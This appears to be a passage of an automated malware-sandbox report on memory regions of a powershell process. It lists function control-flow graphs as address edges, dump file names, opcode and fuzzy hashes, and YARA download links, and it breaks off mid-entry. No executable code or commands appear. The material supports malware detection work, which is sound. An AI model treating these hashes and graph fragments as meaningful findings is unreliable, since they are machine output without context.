78088aa-78088ce 945->949 950 7808892-780889b 947->950 951 780889d 947->951 952 7808ae0-7808ae8 948->952 953 7808ad3-7808ade 948->953 949->872 959 78088d0 949->959 954 78088a2-78088a4 950->954 951->954 955 7808aea-7808af5 952->955 956 7808b0f-7808b93 952->956 953->929 953->952 954->949 955->929 955->956 956->932 959->872 970->924 971->924 972->889 973->889
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2ce2000bf74eaa8b4cf6c4ac37cb8356514c2824502767673a6655649651edd1
                                                                                                                                              • Instruction ID: a02272f8305caac7d5c176c5737ecac45549bf3eb0d59e4d34611d474f08c77c
                                                                                                                                              • Opcode Fuzzy Hash: 2ce2000bf74eaa8b4cf6c4ac37cb8356514c2824502767673a6655649651edd1
                                                                                                                                              • Instruction Fuzzy Hash: 7D126DB4A002099FDB54DF69C854AAEBBB2FF88314F148469E806E7391DB35DD81CB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078051F0 Relevance: .4, Instructions: 438COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 974 78051f0-7805213 975 7805445-780544a 974->975 976 7805219-780521b 974->976 979 7805454-780545c 975->979 977 7805221-7805267 976->977 978 7805463-7805490 976->978 992 7805269-780526b 977->992 993 780526e-7805289 977->993 987 7805492 978->987 988 7805493-78054ba 978->988 979->978 987->988 989 78054c0-78054cf 988->989 990 7805586-78055fb 988->990 994 78054d1-78054dc 989->994 995 78054e4-7805513 989->995 1022 780560c 990->1022 1023 78055fd-780560a 990->1023 992->993 1000 7805313-7805318 993->1000 1001 780528f-780530e 993->1001 994->995 1010 7805515-7805530 995->1010 1011 780553f-7805558 995->1011 1003 7805321 1000->1003 1004 780531a-780531f 1000->1004 1044 7805414-7805418 1001->1044 1006 7805323-7805325 1003->1006 1004->1006 1012 7805332-780537f 1006->1012 1013 7805327-780532a 1006->1013 1010->1011 1031 7805532-780553d 1010->1031 1020 7805563 1011->1020 1021 780555a 1011->1021 1117 7805381 call 78085e0 1012->1117 1118 7805381 call 78085d1 1012->1118 1013->1012 1026 7805564 1020->1026 1021->1020 1025 7805611-7805613 1022->1025 1023->1025 1029 7805622-7805681 1025->1029 1030 7805615-7805620 1025->1030 1026->1026 1067 7805683 1029->1067 1068 78056ad-78056c3 1029->1068 1030->1029 1031->1010 1031->1011 1046 7805423-7805444 1044->1046 1047 780541a 1044->1047 1045 7805387-780539e 1057 78053a0-78053c7 1045->1057 1058 78053c9-78053e2 1045->1058 1053 7805446-780544d 1046->1053 1054 78053ff-7805409 call 7805500 1046->1054 1047->1046 1053->979 1054->1044 1057->1058 1062 78053e4 1058->1062 1063 78053ed 1058->1063 1062->1063 1063->1044 1070 7805686-78056ab 1067->1070 1075 7805803-7805816 1068->1075 1076 78056c9-78056f4 1068->1076 1070->1068 1078 7805818-780581c 1075->1078 1086 78056fa-7805707 1076->1086 1087 780579e-78057b7 1076->1087 1079 7805827 1078->1079 1080 780581e 1078->1080 1083 7805828 1079->1083 1080->1079 1083->1083 1092 7805710 1086->1092 1093 7805709-780570e 1086->1093 1089 78057c2-78057c9 1087->1089 1090 78057b9 1087->1090 1096 78057f2-78057fd 1089->1096 1097 78057cb-78057d2 1089->1097 1090->1089 1094 7805712-7805714 1092->1094 1093->1094 1098 7805716-780571f 1094->1098 1099 780578d-7805798 1094->1099 1096->1075 1096->1076 1097->1096 1102 78057d4-78057e7 1097->1102 1100 7805730-7805734 1098->1100 1101 7805721-7805726 call 7805c00 1098->1101 1099->1086 1099->1087 1115 7805736 call 7805f00 1100->1115 1116 7805736 call 7805f10 1100->1116 1105 780572c-780572e 1101->1105 1102->1078 1105->1100 1107 780573e-7805745 1105->1107 1106 780573c 1106->1107 1108 7805767-7805769 1107->1108 1109 7805747-7805758 1107->1109 1108->1099 1110 780576b-780577d 1108->1110 1109->1108 1112 780575a-7805760 1109->1112 1110->1099 1114 780577f-7805785 1110->1114 1112->1108 1114->1099 1115->1106 1116->1106 1117->1045 1118->1045
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 928d2849c1e258526ebe232eda34b79d49db79cf04bc40d8397a8f7846fc74d7
                                                                                                                                              • Instruction ID: b8a83b726c217be6f194f62d304d451618aa6b68a1d283302648a04999d11943
                                                                                                                                              • Opcode Fuzzy Hash: 928d2849c1e258526ebe232eda34b79d49db79cf04bc40d8397a8f7846fc74d7
                                                                                                                                              • Instruction Fuzzy Hash: 9B02A474A00209DFDB54DFA4D858AAEBBB2FF84315F148429E406EB3A0DB75AD45CF90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078066A1 Relevance: .4, Instructions: 408COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1120 78066a1-78066ca 1123 7806702-780670d 1120->1123 1124 78066cc-78066d3 1120->1124 1129 7806728-7806736 1123->1129 1130 780670f-7806726 call 78065d8 1123->1130 1125 78066d5-78066e6 1124->1125 1126 78066ee-78066ff 1124->1126 1125->1126 1126->1123 1135 7806750-7806757 1129->1135 1136 7806738-780674e call 78037e8 call 78065d8 1129->1136 1141 78067a3-78067a7 1130->1141 1137 7806772-7806789 1135->1137 1138 7806759-780676a 1135->1138 1136->1141 1137->1141 1149 780678b-780679e call 78065d8 1137->1149 1138->1137 1145 78067c5-78067cf 1141->1145 1146 78067a9-78067c2 1141->1146 1152 78067d1-78067d6 1145->1152 1153 78067d8 1145->1153 1146->1145 1149->1141 1156 78067da-78067dc 1152->1156 1153->1156 1158 78067f3-78067ff 1156->1158 1159 78067de-78067eb 1156->1159 1160 7806801-7806812 1158->1160 1161 780681a-780682c 1158->1161 1159->1158 1160->1161 1258 780682e call 78085e0 1161->1258 1259 780682e call 78085d1 1161->1259 1164 7806834-7806874 1167 7806d90-7806de1 call 78065d8 1164->1167 1168 780687a-7806899 1164->1168 1206 7806de3-7806dfd call 78065d8 1167->1206 1207 7806dff-7806e05 1167->1207 1172 7806c21-7806c25 1168->1172 1173 780689f-78068f9 1168->1173 1175 7806d32-7806d89 call 78065d8 1172->1175 1176 7806c2b-7806c36 1172->1176 1202 78069a2-78069c0 1173->1202 1203 78068ff-780693a call 78037e8 1173->1203 1175->1167 1182 7806c38-7806c4c 1176->1182 1183 7806c6c-7806cff 1176->1183 1182->1183 1191 7806c4e-7806c52 1182->1191 1255 7806d02 call 7804650 1183->1255 1256 7806d02 call 7804660 1183->1256 1257 7806d02 call 78045c5 1183->1257 1191->1183 1194 7806c54-7806c69 1191->1194 1194->1183 1260 78069c2 call 78085e0 1202->1260 1261 78069c2 call 78085d1 1202->1261 1226 7806a2d-7806a34 1203->1226 1213 7806e0d-7806e5a 1206->1213 1207->1213 1223 78069c8-78069ce 1223->1226 1228 7806a36-7806a4d 1226->1228 1229 7806a4f 1226->1229 1233 7806a51-7806a53 1228->1233 1229->1233 1235 7806a55-7806a61 1233->1235 1236 7806a9a-7806ab6 1233->1236 1240 7806a63-7806a7d call 78065d8 1235->1240 1241 7806a7f-7806a85 1235->1241 1242 7806ad2 1236->1242 1243 7806ab8-7806acb 1236->1243 1244 7806a8d-7806a90 1240->1244 1241->1244 1242->1172 1243->1242 1244->1236 1253 7806d08-7806d17 1255->1253 1256->1253 1257->1253 1258->1164 1259->1164 1260->1223 1261->1223
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cc19b90d0414b7348168187f0c5cf6bc2837b5211a36406e0038077ff07c71e4
                                                                                                                                              • Instruction ID: 6912f157476a2bbb1788b54f4ae13e1670b5e2115070fbfcfb8a8df24e8023d3
                                                                                                                                              • Opcode Fuzzy Hash: cc19b90d0414b7348168187f0c5cf6bc2837b5211a36406e0038077ff07c71e4
                                                                                                                                              • Instruction Fuzzy Hash: 6302EC74A00219CFCB54DFA4D894AADBBB6FF85305F148569E806EB3A1DB35AC41CF90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07809758 Relevance: .4, Instructions: 383COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1262 7809758-78097ed 1371 78097f0 call 7809e08 1262->1371 1372 78097f0 call 7809f49 1262->1372 1270 78097f6-78098a7 1280 78098a9-78098bd 1270->1280 1281 78098bf-78098dc 1270->1281 1284 78098df-7809940 1280->1284 1281->1284 1292 7809946-7809956 1284->1292 1293 7809a2f-7809a33 1284->1293 1300 78099fa-7809a21 1292->1300 1301 780995c-7809976 1292->1301 1294 7809a35-7809a3b 1293->1294 1295 7809a5b-7809a5d 1293->1295 1298 7809a50-7809a59 1294->1298 1299 7809a3d-7809a4e 1294->1299 1296 7809a64-7809a6a 1295->1296 1302 7809ac9-7809ae3 1296->1302 1303 7809a6c-7809a7a 1296->1303 1298->1296 1299->1296 1299->1298 1373 7809a24 call 780b072 1300->1373 1374 7809a24 call 780b3aa 1300->1374 1310 7809978-7809983 1301->1310 1311 78099dd-78099f8 1301->1311 1317 7809ba4-7809bb7 1302->1317 1318 7809ae9-7809afb 1302->1318 1303->1302 1312 7809a7c-7809a87 1303->1312 1310->1311 1321 7809985-78099a7 1310->1321 1311->1296 1312->1302 1322 7809a89-7809a90 1312->1322 1313 7809a2a-7809a2d 1313->1296 1320 7809bf8-7809bfc 1317->1320 1332 7809b01-7809b08 1318->1332 1333 7809bb9-7809bcd 1318->1333 1326 7809c07-7809c08 1320->1326 1327 7809bfe 1320->1327 1321->1296 1343 78099ad 1321->1343 1323 7809a92-7809aa3 1322->1323 1324 7809aa5-7809aac 1322->1324 1323->1302 1323->1324 1329 7809c20-7809ca4 1324->1329 1330 7809ab2-7809ac3 1324->1330 1326->1329 1327->1326 1330->1302 1330->1329 1334 7809be6-7809bf3 1332->1334 1335 7809b0e-7809b17 call 7807370 1332->1335 1349 7809bd4-7809be1 1333->1349 1334->1320 1351 7809b1f-7809b59 1334->1351 1335->1349 1350 7809b1d 1335->1350 1346 78099b0-78099d6 1343->1346 1359 78099d8 1346->1359 1349->1351 1350->1351 1362 7809b93-7809b9e 1351->1362 1363 7809b5b-7809b88 1351->1363 1359->1296 1362->1317 1362->1318 1363->1362 1371->1270 1372->1270 1373->1313 1374->1313
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: afb90ca96b8993eec733134eb5ef8c7c28657fafe0f8070b3fcef3f451d8f571
                                                                                                                                              • Instruction ID: 8869aa9de1bed49296c3c2a90811e84566a151645f2d737312060d22d56724e6
                                                                                                                                              • Opcode Fuzzy Hash: afb90ca96b8993eec733134eb5ef8c7c28657fafe0f8070b3fcef3f451d8f571
                                                                                                                                              • Instruction Fuzzy Hash: 19F13074A00209DFCB15DFA5D894AADBBF6FF49301F148069E806AB3A5CB35AD45CF90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07807F38 Relevance: .4, Instructions: 381COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1375 7807f38-7807f5c 1376 7807f6d 1375->1376 1377 7807f5e-7807f6b 1375->1377 1378 7807f72-7807f74 1376->1378 1377->1378 1379 7808373-78083b9 1378->1379 1380 7807f7a-7807f89 1378->1380 1391 78083f8-78084b8 1379->1391 1392 78083bb-78083d8 1379->1392 1380->1379 1383 7807f8f-7807f91 1380->1383 1384 7807f93 1383->1384 1385 7807f99-7807fe4 1383->1385 1384->1385 1478 7807fe6 call 7807700 1385->1478 1479 7807fe6 call 78076f1 1385->1479 1400 78083f0-78083f7 1392->1400 1401 78083da-78083e9 1392->1401 1399 7807fec-7808013 1407 7808024 1399->1407 1408 7808015-7808022 1399->1408 1401->1400 1410 7808029-780802b 1407->1410 1408->1410 1411 7808031-7808047 1410->1411 1412 780835c-7808366 1410->1412 1416 7808058-780806d 1411->1416 1417 7808049-7808056 1411->1417 1421 780807e-780808d 1416->1421 1422 780806f-780807c 1416->1422 1417->1416 1421->1412 1427 7808093-78080a7 1421->1427 1422->1421 1430 78080a9-78080b7 1427->1430 1431 78080cc-78080d7 1427->1431 1430->1431 1436 78080b9-78080c9 1430->1436 1434 78080d9-78080e5 1431->1434 1435 78080ea-7808102 1431->1435 1434->1412 1440 7808110 1435->1440 1441 7808104-780810e 1435->1441 1436->1431 1442 7808115-7808117 1440->1442 1441->1442 1443 7808124-7808142 1442->1443 1444 7808119-7808370 1442->1444 1448 7808154-780815e 1443->1448 1449 7808144-7808152 1443->1449 1452 7808160-7808162 1448->1452 1449->1448 1449->1452 1453 7808174-78081db 1452->1453 1454 7808164-7808172 1452->1454 1453->1412 1454->1453 1457 78081e0-78081fe 1454->1457 1462 7808200-7808217 1457->1462 1463 780821c-7808282 1457->1463 1462->1412 1463->1412 1478->1399 1479->1399
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 25429b3a802d1ccf0d0f41cf869a99a229df11305fb220856616b00193589ae4
                                                                                                                                              • Instruction ID: e8e2ad77506ffc25987fac37333d22bd27fcb3228f8214993f290512d6e0fcc9
                                                                                                                                              • Opcode Fuzzy Hash: 25429b3a802d1ccf0d0f41cf869a99a229df11305fb220856616b00193589ae4
                                                                                                                                              • Instruction Fuzzy Hash: 11D17874B002059FCB45DFB8D854AAEBBF2EF89305F148069E906EB390DB759D45CBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07804660 Relevance: .3, Instructions: 318COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 94cd994c39a38e7e0d109d43063c3b1246c1c78fae8c63fa3f76610b59bf2de7
                                                                                                                                              • Instruction ID: 08638c824f98033fd7d93a69700602514b6da56c4b10fa5198f11a9c2b9ea22d
                                                                                                                                              • Opcode Fuzzy Hash: 94cd994c39a38e7e0d109d43063c3b1246c1c78fae8c63fa3f76610b59bf2de7
                                                                                                                                              • Instruction Fuzzy Hash: E2C161B4A401489FDB58EFA4D854BAEBBB6FF89311F148029E906E7394DF359C41CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07809748 Relevance: .3, Instructions: 282COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 10511186161476c1c24fba57d4165474742d261b71e9b376728be3410f03a42c
                                                                                                                                              • Instruction ID: 1dcc31ba6dfbc108f93b21a1bec400523678b022c69ad07dc3faec469db7061a
                                                                                                                                              • Opcode Fuzzy Hash: 10511186161476c1c24fba57d4165474742d261b71e9b376728be3410f03a42c
                                                                                                                                              • Instruction Fuzzy Hash: 8DC13B74A00209CFCB54DFA9D994A9DBBF2FF48301F148469E806AB3A5CB31AD45CF90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07806030 Relevance: .2, Instructions: 246COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0bac743303c85f60864e845b7928424834fcb7e2ca04319b3475b617d7fefbab
                                                                                                                                              • Instruction ID: 97428230df513c22157b05450a7026f180d1d80fe2a743eef31291f785470a0c
                                                                                                                                              • Opcode Fuzzy Hash: 0bac743303c85f60864e845b7928424834fcb7e2ca04319b3475b617d7fefbab
                                                                                                                                              • Instruction Fuzzy Hash: 4A914974B002059FCB44DFA9D894AAEBBF2FF88301F158069E806DB395EB349D458B91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780D2D8 Relevance: .2, Instructions: 244COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5c4c698938d7fc00c9af6cc6d125a38d8de298079e677dfb0491dbcf79937b39
                                                                                                                                              • Instruction ID: 26f7ee36f08853dfe969c4a37b04bfe33e0041ef89548446fe0f958a3d47fbc0
                                                                                                                                              • Opcode Fuzzy Hash: 5c4c698938d7fc00c9af6cc6d125a38d8de298079e677dfb0491dbcf79937b39
                                                                                                                                              • Instruction Fuzzy Hash: 128191787002019FCB159FB9D85496EBBB2FF88315F148069E946CB3A1DB35DD06CBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780F840 Relevance: .2, Instructions: 232COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2998d30f9990aff37e6ceb470b90f9197f43d43f0b55dd99622e8ad0fba52c98
                                                                                                                                              • Instruction ID: 31162f93ddb5955b3567297958eb4a7c096da7b24d8dcb8c138649881e206de6
                                                                                                                                              • Opcode Fuzzy Hash: 2998d30f9990aff37e6ceb470b90f9197f43d43f0b55dd99622e8ad0fba52c98
                                                                                                                                              • Instruction Fuzzy Hash: 7581CB747042059FCB049F38D455AADBBA2EFD5309F048869E506CB3A2DF38AD45CBE1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0780B072 Relevance: .2, Instructions: 232COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35c8faf6a1c8897f82321f1057e0d9ff728859c1fc22df2fa8d5a0a954921725
                                                                                                                                              • Instruction ID: b21dceba9da735b53d36ab64dc9c7782d4304af76b6150e1133afdaa35e71800
                                                                                                                                              • Opcode Fuzzy Hash: 35c8faf6a1c8897f82321f1057e0d9ff728859c1fc22df2fa8d5a0a954921725
                                                                                                                                              • Instruction Fuzzy Hash: 75A15CB4A00209DFDB65DFA4C854BADBBB2FF44304F258069E805AB395CB35AD81CF91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07809028 Relevance: .2, Instructions: 209COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 58a74eea882a20d6920705352c67b79afc831f919087f7695d3fea6cc068b011
                                                                                                                                              • Instruction ID: 1b7d2de2ab4e05693a9c982b394d80e5e928fac7c96960fba4cb7c9c09ab911d
                                                                                                                                              • Opcode Fuzzy Hash: 58a74eea882a20d6920705352c67b79afc831f919087f7695d3fea6cc068b011
                                                                                                                                              • Instruction Fuzzy Hash: 3F71DDB2E00209CFCB15CFA8C8446DDBBB6EF99314F158169D805BB291DB75AA46CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075AE290 Relevance: .2, Instructions: 172COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1a31f20921c0a55ed6c3f3e8fa307be9589c667a04106ca48d31a94efc6edc51
                                                                                                                                              • Instruction ID: e75df53d6ae66b94b976be37c39328f5324b161c08754956f0663d233b43d69a
                                                                                                                                              • Opcode Fuzzy Hash: 1a31f20921c0a55ed6c3f3e8fa307be9589c667a04106ca48d31a94efc6edc51
                                                                                                                                              • Instruction Fuzzy Hash: 8651E17060064AAFCB04EFB8D0555AEBBB2FF85310B04C929D9099B751DB74BD05CBE1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07805C00 Relevance: .2, Instructions: 166COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4276c53b68ff83c2f69522d559874d114063daec852e94043b0f0af3672dd236
                                                                                                                                              • Instruction ID: fa2ccad831e0160cfb3b05718cc4ba79ff06d24277692beb1b187ee43cc534c6
                                                                                                                                              • Opcode Fuzzy Hash: 4276c53b68ff83c2f69522d559874d114063daec852e94043b0f0af3672dd236
                                                                                                                                              • Instruction Fuzzy Hash: C751F4B17006068FDB64DE79CD88BAAB7E6EF85224F10453AC919C7390DA35D8518FF1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078055B8 Relevance: .2, Instructions: 161COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 39cda475cf49e7d9a35c2b5cdcd4475de2c58480a5372a50c09ed04047c7d55c
                                                                                                                                              • Instruction ID: d89cc60cfb8a1faf2b291e74e7fc3493b4ac0f2c10b2f0c72aa074ad5afa71ac
                                                                                                                                              • Opcode Fuzzy Hash: 39cda475cf49e7d9a35c2b5cdcd4475de2c58480a5372a50c09ed04047c7d55c
                                                                                                                                              • Instruction Fuzzy Hash: 46516874A00219DFDB54DFA4C898AAEBBB2FF94314F148429D40ADB3A4DB31AD41CF90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07807F28 Relevance: .2, Instructions: 153COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 923ba25fc677c48504a70808bf7fe5115333fbd47c978b4f0e427d05e4232374
                                                                                                                                              • Instruction ID: 0cd305e65c011b71f7b7d668be3f5d5c46a45de1e06e19e6e53ca4d6841b069f
                                                                                                                                              • Opcode Fuzzy Hash: 923ba25fc677c48504a70808bf7fe5115333fbd47c978b4f0e427d05e4232374
                                                                                                                                              • Instruction Fuzzy Hash: 10512574A00215CFDB54CFA8D844AEEBBF2AF89355F148069E901EB390DB759941CBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07809F49 Relevance: .2, Instructions: 152COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c6d68a7f498bb151d7f8c126f7a52a6660dd86d059108a5c3d494bc697544ca1
                                                                                                                                              • Instruction ID: 4ad75f4acad53c8bec49a9e0170113941e995a975dc9c6d86944d9abd273eb88
                                                                                                                                              • Opcode Fuzzy Hash: c6d68a7f498bb151d7f8c126f7a52a6660dd86d059108a5c3d494bc697544ca1
                                                                                                                                              • Instruction Fuzzy Hash: 3E513C74A00209DFDB14DF78C884A9DBBF2AF89314F15C468E816AB3A1DB35EC41CB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07803320 Relevance: .1, Instructions: 139COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
